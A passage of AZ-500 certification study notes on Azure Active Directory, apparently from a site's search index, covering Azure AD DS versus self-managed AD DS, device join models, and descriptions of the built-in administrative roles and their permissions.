        The following table outlines some of the features you may need for your organization and the differences between a managed Azure AD DS domain or a self-managed AD DS domain:

        • Managed service. Azure AD DS: ✓. Self-managed AD DS: ✕.
        • Secure deployments. Azure AD DS: ✓. Self-managed AD DS: the administrator secures the deployment.
        • Domain Name System (DNS) server. Azure AD DS: ✓ (managed service). Self-managed AD DS: ✓.
        • Domain or Enterprise administrator privileges. Azure AD DS: ✕. Self-managed AD DS: ✓.
        • Domain join. Azure AD DS: ✓. Self-managed AD DS: ✓.
        • Domain authentication using New Technology LAN Manager (NTLM) and Kerberos. Azure AD DS: ✓. Self-managed AD DS: ✓.
        • Kerberos constrained delegation. Azure AD DS: resource-based. Self-managed AD DS: resource-based & account-based.
        • Custom organizational unit (OU) structure. Azure AD DS: ✓. Self-managed AD DS: ✓.
        • Group Policy. Azure AD DS: ✓. Self-managed AD DS: ✓.
        • Schema extensions. Azure AD DS: ✕. Self-managed AD DS: ✓.
        • Active Directory domain/forest trusts. Azure AD DS: ✓ (one-way outbound forest trusts only). Self-managed AD DS: ✓.
        • Secure Lightweight Directory Access Protocol (LDAPS). Azure AD DS: ✓. Self-managed AD DS: ✓.
        • Lightweight Directory Access Protocol (LDAP) read. Azure AD DS: ✓. Self-managed AD DS: ✓.
        • Lightweight Directory Access Protocol (LDAP) write. Azure AD DS: ✓ (within the managed domain). Self-managed AD DS: ✓.
        • Geographically distributed (geo-distributed) deployments. Azure AD DS: ✓. Self-managed AD DS: ✓.

        Azure Active Directory Domain Services (Azure AD DS) provides managed domain services such as domain join, group policy, lightweight directory access protocol (LDAP), and Kerberos/New Technology LAN Manager (NTLM) authentication. You use these domain services without the need to deploy, manage, and patch domain controllers (DCs) in the cloud.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#13-signing-devices-to-azure-active-directory","title":"1.3. Signing devices to Azure Active Directory","text":"

        Azure AD lets you manage the identity of devices used by the organization and control access to corporate resources from those devices. Users can also register their personal device (a bring-your-own (BYO) model) with Azure AD, which provides the device with an identity. Azure AD then authenticates the device when a user signs in to Azure AD and uses the device to access secured resources. The device can be managed using Mobile Device Management (MDM) software like Microsoft Intune. This management ability lets you restrict access to sensitive resources to managed and policy-compliant devices.

        Azure AD joined devices give you the following benefits:

        • Single sign-on (SSO) to applications secured by Azure AD.
        • Enterprise policy-compliant roaming of user settings across devices.
        • Access to the Windows Store for Business using corporate credentials.
        • Windows Hello for Business.
        • Restricted access to apps and resources from devices compliant with corporate policy.

        The following table outlines common device ownership models and how they would typically be joined to a domain:

        • Personal devices. Device platforms: Windows 10, iOS, Android, macOS. Mechanism: Azure AD registered.
        • Organization-owned device not joined to on-premises AD DS. Device platforms: Windows 10. Mechanism: Azure AD joined.
        • Organization-owned device joined to an on-premises AD DS. Device platforms: Windows 10. Mechanism: Hybrid Azure AD joined.

        The following table outlines differences in how the devices are represented and can authenticate themselves against the directory:

        • Device controlled by. Azure AD-joined: Azure AD. Azure AD DS-joined: Azure AD DS managed domain.
        • Representation in the directory. Azure AD-joined: device objects in the Azure AD directory. Azure AD DS-joined: computer objects in the Azure AD DS managed domain.
        • Authentication. Azure AD-joined: OAuth / OpenID Connect-based protocols; these protocols are designed to work over the internet, so they're great for mobile scenarios where users access corporate resources from anywhere. Azure AD DS-joined: Kerberos and NTLM protocols, so it can support legacy applications migrated to run on Azure VMs as part of a lift-and-shift strategy.
        • Management. Azure AD-joined: Mobile Device Management (MDM) software like Intune. Azure AD DS-joined: Group Policy.
        • Networking. Azure AD-joined: works over the internet. Azure AD DS-joined: must be connected to, or peered with, the virtual network where the managed domain is deployed.
        • Great for. Azure AD-joined: end-user mobile or desktop devices. Azure AD DS-joined: server VMs deployed in Azure.

        If on-premises AD DS and Azure AD are configured for federated authentication using Active Directory Federation Services (AD FS), then there's no (current/valid) password hash available in Azure AD DS. Azure AD user accounts created before federated authentication was implemented might have an old password hash that doesn't match a hash of their on-premises password, so Azure AD DS won't validate the user's credentials.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#14-roles-in-azure-active-directory","title":"1.4. Roles in Azure Active Directory","text":"

        Azure AD built-in roles differ in where they can be used, which fall into the following three broad categories.

        1. Azure AD-specific roles: These roles grant permissions to manage resources within Azure AD only. For example, User Administrator, Application Administrator, and Groups Administrator all grant permissions to manage resources that live in Azure AD.
        2. Service-specific roles: For major Microsoft 365 services (non-Azure AD), we have built service-specific roles that grant permissions to manage all features within the service.
        3. Cross-service roles: There are some roles that span services. We have two global roles - Global Administrator and Global Reader. All Microsoft 365 services honor these two roles. Also, there are some security-related roles like Security Administrator and Security Reader that grant access across multiple security services within Microsoft 365. For example, using Security Administrator roles in Azure AD, you can manage the Microsoft 365 Defender portal, Microsoft Defender Advanced Threat Protection, and Microsoft Defender for Cloud Apps.
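
        As an illustration, the directory roles currently activated in a tenant can be listed through Microsoft Graph with the Azure CLI (assuming an account with sufficient read permissions):

        # List activated directory roles via the Graph API
        az rest --method get --url "https://graph.microsoft.com/v1.0/directoryRoles" \
            --query "value[].displayName" --output table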

        The following table is offered as an aid to understanding these role categories. The categories are named arbitrarily and aren't intended to imply any other capabilities beyond the documented Azure AD role permissions.

        • Azure AD-specific roles: Application Administrator, Application Developer, Authentication Administrator, Business to consumer (B2C) Identity Experience Framework (IEF) Keyset Administrator, Business to consumer (B2C) Identity Experience Framework (IEF) Policy Administrator, Cloud Application Administrator, Cloud Device Administrator, Conditional Access Administrator, Device Administrators, Directory Readers, Directory Synchronization Accounts, Directory Writers, External ID User Flow Administrator, External ID User Flow Attribute Administrator, External Identity Provider Administrator, Groups Administrator, Guest Inviter, Helpdesk Administrator, Hybrid Identity Administrator, License Administrator, Partner Tier1 Support, Partner Tier2 Support, Password Administrator, Privileged Authentication Administrator, Privileged Role Administrator, Reports Reader, User Administrator.
        • Cross-service roles: Global Administrator, Compliance Administrator, Compliance Data Administrator, Global Reader, Security Administrator, Security Operator, Security Reader, Service Support Administrator.
        • Service-specific roles: Azure DevOps Administrator, Azure Information Protection Administrator, Billing Administrator, Customer relationship management (CRM) Service Administrator, Customer Lockbox Access Approver, Desktop Analytics Administrator, Exchange Service Administrator, Insights Administrator, Insights Business Leader, Intune Service Administrator, Kaizala Administrator, Lync Service Administrator, Message Center Privacy Reader, Message Center Reader, Modern Commerce User, Network Administrator, Office Apps Administrator, Power BI Service Administrator, Power Platform Administrator, Printer Administrator, Printer Technician, Search Administrator, Search Editor, SharePoint Service Administrator, Teams Communications Administrator, Teams Communications Support Engineer, Teams Communications Support Specialist, Teams Devices Administrator, Teams Administrator.

        These are all of the Azure AD built-in roles:

        • Application Administrator: Users in this role can create and manage all aspects of enterprise applications, application registrations, and application proxy settings. Users assigned to this role aren't added as owners when creating new application registrations or enterprise applications. This role also grants the ability to consent for delegated permissions and application permissions, except for application permissions for Microsoft Graph.
        • Application Developer: Can create application registrations when the "Users can register applications" setting is set to No.
        • Attack Payload Author: Users in this role can create attack payloads but not actually launch or schedule them. Attack payloads are then available to all administrators in the tenant, who can use them to create a simulation.
        • Attack Simulation Administrator: Users in this role can create and manage all aspects of attack simulation creation, launch/scheduling of a simulation, and the review of simulation results. Members of this role have this access for all simulations in the tenant.
        • Attribute Assignment Administrator: Users with this role can assign and remove custom security attribute keys and values for supported Azure AD objects such as users, service principals, and devices. By default, Global Administrator and other administrator roles don't have permissions to read, define, or assign custom security attributes. To work with custom security attributes, you must be assigned one of the custom security attribute roles.
        • Attribute Assignment Reader: Users with this role can read custom security attribute keys and values for supported Azure AD objects. By default, Global Administrator and other administrator roles don't have permissions to read, define, or assign custom security attributes. You must be assigned one of the custom security attribute roles to work with custom security attributes.
        • Attribute Definition Administrator: Users with this role can define a valid set of custom security attributes that can be assigned to supported Azure AD objects. This role can also activate and deactivate custom security attributes. By default, Global Administrator and other administrator roles don't have permissions to read, define, or assign custom security attributes. To work with custom security attributes, you must be assigned one of the custom security attribute roles.
        • Authentication Administrator: Assign the Authentication Administrator role to users who need to do the following: set or reset any authentication method (including passwords) for nonadministrators and some roles; require users who are nonadministrators or assigned to some roles to re-register against existing nonpassword credentials (for example, Multifactor Authentication (MFA) or Fast ID Online (FIDO)), and also revoke remember MFA on the device, which prompts for MFA on the next sign-in; perform sensitive actions for some users; create and manage support tickets in Azure and the Microsoft 365 admin center. Users with this role can't change the credentials or reset MFA for members and owners of a role-assignable group, and can't manage MFA settings in the legacy MFA management portal or Hardware OATH tokens. The same functions can be accomplished using the Set-MsolUser cmdlet in the Azure AD PowerShell module.
        • Authentication Policy Administrator: Assign the Authentication Policy Administrator role to users who need to do the following: configure the authentication methods policy, tenant-wide MFA settings, and password protection policy that determine which methods each user can register and use; manage Password Protection settings (smart lockout configurations and updating the custom banned passwords list); create and manage verifiable credentials; create and manage Azure support tickets. Users with this role can't update sensitive properties, can't delete or restore users, and can't manage MFA settings in the legacy MFA management portal or Hardware OATH tokens.
        • Azure AD Joined Device Local Administrator: This role is available for assignment only as another local administrator in Device settings. Users with this role become local machine administrators on all Windows 10 devices that are joined to Azure Active Directory. They don't have the ability to manage device objects in Azure Active Directory.
        • Azure DevOps Administrator: Users with this role can manage all enterprise Azure DevOps policies applicable to all Azure DevOps organizations backed by the Azure AD. Users in this role can manage these policies by navigating to any Azure DevOps organization that is backed by the company's Azure AD. Users in this role can claim ownership of orphaned Azure DevOps organizations. This role grants no other Azure DevOps-specific permissions (for example, Project Collection Administrators) inside any of the Azure DevOps organizations backed by the company's Azure AD organization.
        • Azure Information Protection Administrator: Users with this role have all permissions in the Azure Information Protection service. This role allows configuring labels for the Azure Information Protection policy, managing protection templates, and activating protection. This role doesn't grant any permissions in Identity Protection Center, Privileged Identity Management, Monitor Microsoft 365 Service Health, or Office 365 Security and compliance center.
        • Business-to-Consumer (B2C) Identity Experience Framework (IEF) Keyset Administrator: Users can create and manage policy keys and secrets for token encryption, token signatures, and claim encryption/decryption. By adding new keys to existing key containers, this limited administrator can roll over secrets as needed without impacting existing applications. This user can see the full content of these secrets and their expiration dates even after their creation.
        • Business-to-Consumer (B2C) Identity Experience Framework (IEF) Policy Administrator: Users in this role have the ability to create, read, update, and delete all custom policies in Azure AD B2C and therefore have full control over the Identity Experience Framework in the relevant Azure AD B2C organization. By editing policies, this user can establish direct federation with external identity providers, change the directory schema, change all user-facing content (HyperText Markup Language (HTML), Cascading Style Sheets (CSS), JavaScript), change the requirements to complete authentication, create new users, send user data to external systems including full migrations, and edit all user information including sensitive fields like passwords and phone numbers. Conversely, this role can't change the encryption keys or edit the secrets used for federation in the organization.
        • Billing Administrator: Makes purchases, manages subscriptions, manages support tickets, and monitors service health.
        • Cloud App Security Administrator: Users with this role have full permissions in Defender for Cloud Apps. They can add administrators, add Microsoft Defender for Cloud Apps policies and settings, upload logs, and perform governance actions.
        • Cloud Application Administrator: Users in this role have the same permissions as the Application Administrator role, excluding the ability to manage application proxy. This role grants the ability to create and manage all aspects of enterprise applications and application registrations. Users assigned to this role aren't added as owners when creating new application registrations or enterprise applications. This role also grants the ability to consent for delegated permissions and application permissions, except for application permissions for Microsoft Graph.
        • Cloud Device Administrator: Users in this role can enable, disable, and delete devices in Azure AD and read Windows 10 BitLocker keys (if present) in the Azure portal. The role doesn't grant permissions to manage any other properties on the device.
        • Compliance Administrator: Users with this role have permissions to manage compliance-related features in the Microsoft Purview compliance portal, Microsoft 365 admin center, Azure, and Office 365 Security and compliance center. Assignees can also manage all features within the Exchange admin center and create support tickets for Azure and Microsoft 365.
        • Compliance Data Administrator: Users with this role have permissions to track data in the Microsoft Purview compliance portal, Microsoft 365 admin center, and Azure. Users can also track compliance data within the Exchange admin center, Compliance Manager, and Teams and Skype for Business admin center and create support tickets for Azure and Microsoft 365.
        • Conditional Access Administrator: Users with this role have the ability to manage Azure Active Directory Conditional Access settings.
        • Customer Lockbox Access Approver: Manages Microsoft Purview Customer Lockbox requests in your organization. They receive email notifications for Customer Lockbox requests and can approve and deny requests from the Microsoft 365 admin center. They can also turn the Customer Lockbox feature on or off. Only Global Administrators can reset the passwords of people assigned to this role.
        • Desktop Analytics Administrator: Users in this role can manage the Desktop Analytics service, including viewing asset inventory, creating deployment plans, and viewing deployment and health status.
        • Directory Readers: Users in this role can read basic directory information. This role should be used for: granting a specific set of guest users read access instead of granting it to all guest users; granting a specific set of nonadmin users access to the Azure portal when "Restrict access to Azure AD portal to admins only" is set to "Yes"; granting service principals access to the directory where Directory.Read.All isn't an option.
        • Directory Synchronization Accounts: Don't use. This role is automatically assigned to the Azure AD Connect service and isn't intended or supported for any other use.
        • Directory Writers: Users in this role can read and update basic information of users, groups, and service principals.
        • Domain Name Administrator: Users with this role can manage (read, add, verify, update, and delete) domain names. They can also read directory information about users, groups, and applications, as these objects possess domain dependencies. For on-premises environments, users with this role can configure domain names for federation so that associated users are always authenticated on-premises. These users can then sign into Azure AD-based services with their on-premises passwords via single sign-on. Federation settings need to be synced via Azure AD Connect, so users also have permissions to manage Azure AD Connect.
        • Dynamics 365 Administrator: Users with this role have global permissions within Microsoft Dynamics 365 Online when the service is present, and the ability to manage support tickets and monitor service health.
        • Edge Administrator: Users in this role can create and manage the enterprise site list required for Internet Explorer mode on Microsoft Edge. This role grants permissions to create, edit, and publish the site list and additionally allows access to manage support tickets.
        • Exchange Administrator: Users with this role have global permissions within Microsoft Exchange Online, when the service is present. Also has the ability to create and manage all Microsoft 365 groups, manage support tickets, and monitor service health.
        • Exchange Recipient Administrator: Users with this role have read access to recipients and write access to the attributes of those recipients in Exchange Online.
        • External ID User Flow Administrator: Users with this role can create and manage user flows (also called "built-in" policies) in the Azure portal. These users can customize HTML/CSS/JavaScript content, change MFA requirements, select claims in the token, manage API connectors and their credentials, and configure session settings for all user flows in the Azure AD organization. On the other hand, this role doesn't include the ability to review user data or make changes to the attributes that are included in the organization schema. Changes to Identity Experience Framework policies (also known as custom policies) are also outside the scope of this role.
        • External ID User Flow Attribute Administrator: Users with this role add or delete custom attributes available to all user flows in the Azure AD organization. Users with this role can change or add new elements to the end-user schema and impact the behavior of all user flows, and indirectly result in changes to what data may be asked of end users and ultimately sent as claims to applications. This role can't edit user flows.
        • External Identity Provider Administrator: This administrator manages federation between Azure AD organizations and external identity providers. With this role, users can add new identity providers and configure all available settings (for example, authentication path, service ID, assigned key containers). This user can enable the Azure AD organization to trust authentications from external identity providers. The resulting impact on end-user experiences depends on the type of organization. For Azure AD organizations for employees and partners, the addition of a federation (for example, with Gmail) immediately impacts all guest invitations not yet redeemed; see Adding Google as an identity provider for B2B guest users. For Azure Active Directory B2C organizations, the addition of a federation (for example, with Facebook, or with another Azure AD organization) doesn't immediately impact end-user flows until the identity provider is added as an option in a user flow (also called a built-in policy).
        • Global Administrator: Users with this role have access to all administrative features in Azure Active Directory, and services that use Azure Active Directory identities like the Microsoft 365 Defender portal, the Microsoft Purview compliance portal, Exchange Online, SharePoint Online, and Skype for Business Online. Furthermore, Global Administrators can elevate their access to manage all Azure subscriptions and management groups, giving them full access to all Azure resources using the respective Azure AD tenant. The person who signs up for the Azure AD organization becomes a Global Administrator. There can be more than one Global Administrator at your company. Global Administrators can reset the password for any user and all other administrators. As a best practice, Microsoft recommends that you assign the Global Administrator role to fewer than five people in your organization.
        • Global Reader: Users in this role can read settings and administrative information across Microsoft 365 services but can't take management actions. Global Reader is the read-only counterpart to Global Administrator. Assign Global Reader instead of Global Administrator for planning, audits, or investigations. Use Global Reader in combination with other limited admin roles like Exchange Administrator to make it easier to get work done without assigning the Global Administrator role. Global Reader works with the Microsoft 365 admin center, Exchange admin center, SharePoint admin center, Teams admin center, Security center, compliance center, Azure AD admin center, and Device Management admin center. Users with this role can't access the Purchase Services area in the Microsoft 365 admin center.
        • Groups Administrator: Users in this role can create/manage groups and their settings like naming and expiration policies. It's important to understand that assigning a user to this role gives them the ability to manage all groups in the organization across various workloads like Teams, SharePoint, and Yammer in addition to Outlook. Also, the user is able to manage the various groups settings across various admin portals like the Microsoft admin center, the Azure portal, and workload-specific ones like the Teams and SharePoint admin centers.
        • Guest Inviter: Users in this role can manage Azure Active Directory B2B guest user invitations when the Members can invite user setting is set to No.
        • Helpdesk Administrator: Users with this role can change passwords, invalidate refresh tokens, create and manage support requests with Microsoft for Azure and Microsoft 365 services, and monitor service health. Invalidating a refresh token forces the user to sign in again. Whether a Helpdesk Administrator can reset a user's password and invalidate refresh tokens depends on the role the user is assigned. Users with this role can't change the credentials or reset MFA for members and owners of a role-assignable group.
        • Hybrid Identity Administrator: Users in this role can create, manage, and deploy provisioning configuration setup from AD to Azure AD using Cloud Provisioning, and manage Azure AD Connect, Pass-through Authentication (PTA), Password hash synchronization (PHS), Seamless single sign-on (Seamless SSO), and federation settings. Users can also troubleshoot and monitor logs using this role.
        • Identity Governance Administrator: Users with this role can manage Azure AD identity governance configuration, including access packages, access reviews, catalogs, and policies, ensuring access is approved and reviewed and guest users who no longer need access are removed.
        • Insights Administrator: Users in this role can access the full set of administrative capabilities in the Microsoft Viva Insights app. This role has the ability to read directory information, monitor service health, file support tickets, and access the Insights Administrator settings aspects.
        • Insights Analyst: Assign the Insights Analyst role to users who need to do the following tasks: analyze data in the Microsoft Viva Insights app, but not manage any configuration settings; create, manage, and run queries; view basic settings and reports in the Microsoft 365 admin center; create and manage service requests in the Microsoft 365 admin center.
        • Insights Business Leader: Users in this role can access a set of dashboards and insights via the Microsoft Viva Insights app. This includes full access to all dashboards and presented insights and data exploration functionality. Users in this role don't have access to product configuration settings, which is the responsibility of the Insights Administrator role.
        • Intune Administrator: Users with this role have global permissions within Microsoft Intune Online, when the service is present. Additionally, this role contains the ability to manage users and devices to associate policy and to create and manage groups. This role can create and manage all security groups. However, Intune Administrator doesn't have admin rights over Office groups. That means the admin can't update owners or memberships of all Office groups in the organization. However, you can manage the Office group that's created, which comes as a part of end-user privileges. So, any Office group (not security group) that you create should be counted against your quota of 250.
        • Kaizala Administrator: Users with this role have global permissions to manage settings within Microsoft Kaizala, when the service is present, and the ability to manage support tickets and monitor service health. Additionally, the user can access reports related to adoption and usage of Kaizala by organization members and business reports generated using the Kaizala actions.
        • Knowledge Administrator: Users in this role have full access to all knowledge, learning, and intelligent features settings in the Microsoft 365 admin center. They have a general understanding of the suite of products, licensing details, and have responsibility to control access. Knowledge Administrator can create and manage content, like topics, acronyms, and learning resources. Additionally, these users can create content centers, monitor service health, and create service requests.
        • Knowledge Manager: Users in this role can create and manage content, like topics, acronyms, and learning content. These users are primarily responsible for the quality and structure of knowledge. This user has full rights to topic management actions to confirm a topic, approve edits, or delete a topic. This role can also manage taxonomies as part of the term store management tool and create content centers.
        • License Administrator: Users in this role can add, remove, and update license assignments on users and groups (using group-based licensing), and manage the usage location on users. The role doesn't grant the ability to purchase or manage subscriptions, create or manage groups, or create or manage users beyond the usage location. This role has no access to view, create, or manage support tickets.
        • Lifecycle Workflows Administrator: Assign the Lifecycle Workflows Administrator role to users who need to do the following tasks: create and manage all aspects of workflows and tasks associated with Lifecycle Workflows in Azure AD; check the execution of scheduled workflows; launch on-demand workflow runs; inspect workflow execution logs.
        • Message Center Privacy Reader: Users in this role can monitor all notifications in the Message Center, including data privacy messages. Message Center Privacy Readers get email notifications, including those related to data privacy, and they can unsubscribe using Message Center Preferences. Only the Global Administrator and the Message Center Privacy Reader can read data privacy messages. Additionally, this role contains the ability to view groups, domains, and subscriptions. This role has no permission to view, create, or manage service requests.
        • Message Center Reader: Users in this role can monitor notifications and advisory health updates in the Message center for their organization on configured services such as Exchange, Intune, and Microsoft Teams. Message Center Readers receive weekly email digests of posts and updates, and can share message center posts in Microsoft 365. In Azure AD, users assigned to this role will only have read-only access on Azure AD services such as users and groups. This role has no access to view, create, or manage support tickets.
        • Microsoft Hardware Warranty Administrator: Assign the Microsoft Hardware Warranty Administrator role to users who need to do the following tasks: create new warranty claims for Microsoft manufactured hardware, like Surface and HoloLens; search and read opened or closed warranty claims; search and read warranty claims by serial number; create, read, update, and delete shipping addresses; read shipping status for open warranty claims; create and manage service requests in the Microsoft 365 admin center; read Message center announcements in the Microsoft 365 admin center.
        • Microsoft Hardware Warranty Specialist: Assign the Microsoft Hardware Warranty Specialist role to users who need to do the following tasks: create new warranty claims for Microsoft manufactured hardware, like Surface and HoloLens; read warranty claims that they created; read and update existing shipping addresses; read shipping status for open warranty claims they created; create and manage service requests in the Microsoft 365 admin center.
        • Modern Commerce User: Don't use. This role is automatically assigned from Commerce and isn't intended or supported for any other use. The Modern Commerce User role gives certain users permission to access the Microsoft 365 admin center and see the left navigation entries for Home, Billing, and Support. The content available in these areas is controlled by commerce-specific roles assigned to users to manage products that they bought for themselves or your organization. This might include tasks like paying bills, or access to billing accounts and billing profiles. Users with the Modern Commerce User role typically have administrative permissions in other Microsoft purchasing systems, but don't have Global Administrator or Billing Administrator roles used to access the admin center.
        • Network Administrator: Users in this role can review network perimeter architecture recommendations from Microsoft that are based on network telemetry from their user locations. Network performance for Microsoft 365 relies on careful enterprise customer network perimeter architecture, which is generally user-location specific. This role allows for editing of discovered user locations and configuration of network parameters for those locations to facilitate improved telemetry measurements and design recommendations.
        • Office Apps Administrator: Users in this role can manage Microsoft 365 apps' cloud settings. This includes managing cloud policies, self-service download management, and the ability to view Office apps related reports. This role additionally grants the ability to manage support tickets and monitor service health within the main admin center. Users assigned to this role can also manage communication of new features in Office apps.
        • Organizational Messages Writer: Assign the Organizational Messages Writer role to users who need to do the following tasks: write, publish, and delete organizational messages using the Microsoft 365 admin center or Microsoft Endpoint Manager; manage organizational message delivery options using the Microsoft 365 admin center or Microsoft Endpoint Manager; read organizational message delivery results using the Microsoft 365 admin center or Microsoft Endpoint Manager; view usage reports and most settings in the Microsoft 365 admin center, but can't make changes.
        • Partner Tier1 Support: Don't use. This role has been deprecated and will be removed from Azure AD in the future. This role is intended for use by a few Microsoft resale partners and isn't intended for general use.
        • Partner Tier2 Support: Don't use. This role has been deprecated and will be removed from Azure AD in the future. This role is intended for use by a few Microsoft resale partners and isn't intended for general use.
        • Password Administrator: Users with this role have limited ability to manage passwords. This role doesn't grant the ability to manage service requests or monitor service health. Whether a Password Administrator can reset a user's password depends on the role the user is assigned. Users with this role can't change the credentials or reset MFA for members and owners of a role-assignable group.
        • Permissions Management Administrator: Assign the Permissions Management Administrator role to users who need to manage all aspects of Entra Permissions Management, when the service is present.
        • Power Business Intelligence (BI) Administrator: Users with this role have global permissions within Microsoft Power BI, when the service is present, and the ability to manage support tickets and monitor service health.
        • Power Platform Administrator: Users in this role can create and manage all aspects of environments, Power Apps, Flows, and Data Loss Prevention policies. Additionally, users with this role have the ability to manage support tickets and monitor service health.
        • Printer Administrator: Users in this role can register printers and manage all aspects of all printer configurations in the Microsoft Universal Print solution, including the Universal Print Connector settings. They can consent to all delegated print permission requests. Printer Administrators also have access to print reports.
        • Printer Technician: Users with this role can register printers and manage printer status in the Microsoft Universal Print solution. They can also read all connector information. Key tasks a Printer Technician can't do are setting user permissions on printers and sharing printers.
        • Privileged Authentication Administrator: Assign the Privileged Authentication Administrator role to users who need to do the following tasks: set or reset any authentication method (including passwords) for any user, including Global Administrators; delete or restore any users, including Global Administrators (for more information, see Who can perform sensitive actions); force users to re-register against existing nonpassword credentials (such as MFA or FIDO) and revoke remember MFA on the device, prompting for MFA on the next sign-in of all users; update sensitive properties for all users (for more information, see Who can perform sensitive actions); create and manage support tickets in Azure and the Microsoft 365 admin center. Users with this role can't manage per-user MFA in the legacy MFA management portal. The same functions can be accomplished using the Set-MsolUser cmdlet in the Azure AD PowerShell module.
        • Privileged Role Administrator: Users with this role can manage role assignments in Azure Active Directory and within Azure AD Privileged Identity Management. They can create and manage groups that can be assigned to Azure AD roles. In addition, this role allows management of all aspects of Privileged Identity Management and administrative units. This role grants the ability to manage assignments for all Azure AD roles, including the Global Administrator role. It doesn't include any other privileged abilities in Azure AD, like creating or updating users. However, users assigned to this role can grant themselves or others additional privileges by assigning extra roles.
        • Reports Reader: Users with this role can view usage reporting data and the reports dashboard in the Microsoft 365 admin center and the adoption context pack in Power Business Intelligence (Power BI). Additionally, the role provides access to all sign-in logs, audit logs, and activity reports in Azure AD and data returned by the Microsoft Graph reporting API. A user assigned to the Reports Reader role can access only relevant usage and adoption metrics. They don't have any admin permissions to configure settings or access the product-specific admin centers like Exchange. This role has no access to view, create, or manage support tickets.
        • Search Administrator: Users in this role have full access to all Microsoft Search management features in the Microsoft 365 admin center. Additionally, these users can view the message center, monitor service health, and create service requests.
        • Search Editor: Users in this role can create, manage, and delete content for Microsoft Search in the Microsoft 365 admin center, including bookmarks, questions and answers, and locations.
        • Security Administrator: Users with this role have permissions to manage security-related features in the Microsoft 365 Defender portal, Azure Active Directory Identity Protection, Azure Active Directory Authentication, Azure Information Protection, and Office 365 Security and compliance center.
        • Security Operator: Users with this role can manage alerts and have global read-only access on security-related features, including all information in the Microsoft 365 security center, Azure Active Directory, Identity Protection, Privileged Identity Management, and Office 365 Security & compliance center.
        • Security Reader: Users with this role have global read-only access on security-related features, including all information in the Microsoft 365 security center, Azure Active Directory, Identity Protection, and Privileged Identity Management, plus the ability to read Azure Active Directory sign-in reports and audit logs, and read access in the Office 365 Security and compliance center.
        • Service Support Administrator: Users with this role can create and manage support requests with Microsoft for Azure and Microsoft 365 services, and view the service dashboard and message center in the Azure portal and Microsoft 365 admin center.
        • SharePoint Administrator: Users with this role have global permissions within Microsoft SharePoint Online, when the service is present, and the ability to create and manage all Microsoft 365 groups, manage support tickets, and monitor service health.
        • Skype for Business Administrator: Users with this role have global permissions within Microsoft Skype for Business, when the service is present, and manage Skype-specific user attributes in Azure Active Directory. Additionally, this role grants the ability to manage support tickets, monitor service health, and access the Teams and Skype for Business admin center. The account must also be licensed for Teams or it can't run Teams PowerShell cmdlets.
        • Teams Administrator: Users in this role can manage all aspects of the Microsoft Teams workload via the Microsoft Teams and Skype for Business admin center and the respective PowerShell modules. This includes, among other areas, all management tools related to telephony, messaging, meetings, and the teams themselves. This role additionally grants the ability to create and manage all Microsoft 365 groups, manage support tickets, and monitor service health.
        • Teams Communications Administrator: Users in this role can manage aspects of the Microsoft Teams workload related to voice and telephony. This includes the management tools for telephone number assignment, voice and meeting policies, and full access to the call analytics toolset.
        • Teams Communications Support Engineer: Users in this role can troubleshoot communication issues within Microsoft Teams and Skype for Business using the user call troubleshooting tools in the Microsoft Teams and Skype for Business admin center. Users in this role can view full call record information for all participants involved. This role has no access to view, create, or manage support tickets.
        • Teams Communications Support Specialist: Users in this role can troubleshoot communication issues within Microsoft Teams and Skype for Business using the user call troubleshooting tools in the Microsoft Teams and Skype for Business admin center. Users in this role can only view user details in the call for the specific user they've looked up. This role has no access to view, create, or manage support tickets.
        • Teams Devices Administrator: Users with this role can manage Teams-certified devices from the Teams admin center. This role allows viewing all devices at a single glance, with the ability to search and filter devices. The user can check details of each device, including the logged-in account and the make and model of the device. The user can change the settings on the device and update the software versions. This role doesn't grant permissions to check Teams activity and call quality of the device.
Tenant Creator Assign the Tenant Creator role to users who need to do the following tasks: -Create\u00a0both Azure Active Directory and Azure Active Directory B2C tenants even if the tenant creation toggle is turned off in the user settings Usage Summary Reports Reader Users with this role can access tenant level aggregated data and associated insights in Microsoft 365 admin center for Usage and Productivity Score but can't access any user level details or insights. In Microsoft 365 admin center for the two reports, we differentiate between tenant level aggregated data and user level details. This role gives an extra layer of protection on individual user identifiable data, which was requested by both customers and legal teams. User Administrator Assign the User Administrator role to users who need to do the following tasks: -Create users -Update most user properties for all users, including all administrators -Update sensitive properties (including user principal name) for some users -Disable or enable some users -Delete or restore some users -Create and manage user views -Create and manage all groups -Assign licenses for all users, including all administrators -Reset passwords -Invalidate refresh tokens -Update (FIDO) device keys -Update password expiration policies -Create and manage support tickets in Azure and the Microsoft 365 admin center -Monitor service healthUsers with this role\u00a0can't\u00a0do the following tasks: -Can't manage MFA. -Can't change the credentials or reset MFA for members and owners of a role-assignable group. -Can't manage shared mailboxes User Administrator Users with this role can\u00a0change passwords\u00a0for people who may have access to sensitive or private information or critical configuration inside and outside of Azure Active Directory. Changing the password of a user may mean the ability to assume that user's identity and permissions. For example: -Application Registration and Enterprise Application owners, who can manage credentials of apps they own. Those apps may have privileged permissions in Azure AD and elsewhere not granted to User Administrators. Through this path, a User Administrator may be able to assume the identity of an application owner and then further assume the identity of a privileged application by updating the credentials for the application. -Azure subscription owners, who may have access to sensitive or private information or critical configuration in Azure. -Security Group and Microsoft 365 group owners, who can manage group membership. Those groups may grant access to sensitive or private information or critical configuration in Azure AD and elsewhere. -Administrators in other services outside of Azure AD like Exchange Online, Office Security and compliance center, and human resources systems. -Nonadministrators\u00a0like executives, legal counsel, and human resources employees who may have access to sensitive or private information. Virtual Visits Administrator Users with this role can do the following tasks: -Manage and configure all aspects of Virtual Visits in Bookings in the Microsoft 365 admin center, and in the Teams Electronic Health Record (EHR) connector -View usage reports for Virtual Visits in the Teams admin center, Microsoft 365 admin center, and Power BI -View features and settings in the Microsoft 365 admin center, but can't edit any settings Windows 365 Administrator Users with this role have global permissions on Windows 365 resources, when the service is present. 
